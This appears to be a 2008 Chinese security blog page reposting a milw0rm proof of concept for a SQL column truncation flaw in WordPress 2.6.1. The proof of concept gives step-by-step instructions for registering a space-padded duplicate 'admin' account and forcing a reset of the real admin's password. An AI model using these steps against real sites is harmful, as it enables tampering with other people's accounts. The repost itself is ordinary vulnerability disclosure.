WordPress 2.6.1 SQL Column Truncation Vulnerability分析 _漏洞分析

用wordpress的要注意了，不过拿我这里测试就没效果了，我从一开始就是关闭用户注册的。 # wordpress 2.6.1 sql column truncation vulnerability (poc)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: stefan esser, lukasz pilorz, condemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated 'admin' account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admin's password changed, but new password will be send to correct admin email ;/ # milw0rm.com

IE7弹出窗口地址栏URI欺骗漏洞

IE7弹出窗口地址栏URI欺骗漏洞受影响系统：　　Microsoft Internet Explorer 7.0　　描述：　　BUGTRAQ ID: 28... [阅读全文]

Linux Audit audit_log_user_command 栈溢出漏洞

Linux Audit audit_log_user_command 栈溢出漏洞受影响系统：Linux Audit Linux Audit 1.6.9不受影... [阅读全文]

RealPlayer又曝新漏洞

RealPlayer又曝新漏洞 RealPlayer的漏洞问题越来越严重，milworm在昨天再次发布了一个Real Player 控件溢出漏洞。在环境 Wi... [阅读全文]

IBM solidDB数据库含格式串处理以及拒绝服务漏洞

IBM solidDB数据库含格式串处理以及拒绝服务漏洞受影响系统：IBM solidDB <= 06.00.1018描述：IBM solidDB是可... [阅读全文]

VLC媒体播放器MP4_ReadBox_rdrf()函数堆溢出漏洞

VLC媒体播放器MP4_ReadBox_rdrf()函数堆溢出漏洞受影响系统： VideoLAN VLC Media Player 0.8.6e 描述： V... [阅读全文]

Thunderbird/Seamonkey/Firefox修复多个安全漏洞

Thunderbird/Seamonkey/Firefox修复多个安全漏洞受影响系统： Mozilla Firefox <= 2.0.0.12 Moz... [阅读全文]


验证码：

验证码：

WordPress 2.6.1 SQL Column Truncation Vulnerability分析

2008年10月08日 • 漏洞分析 •我要评论

相关文章:

发表评论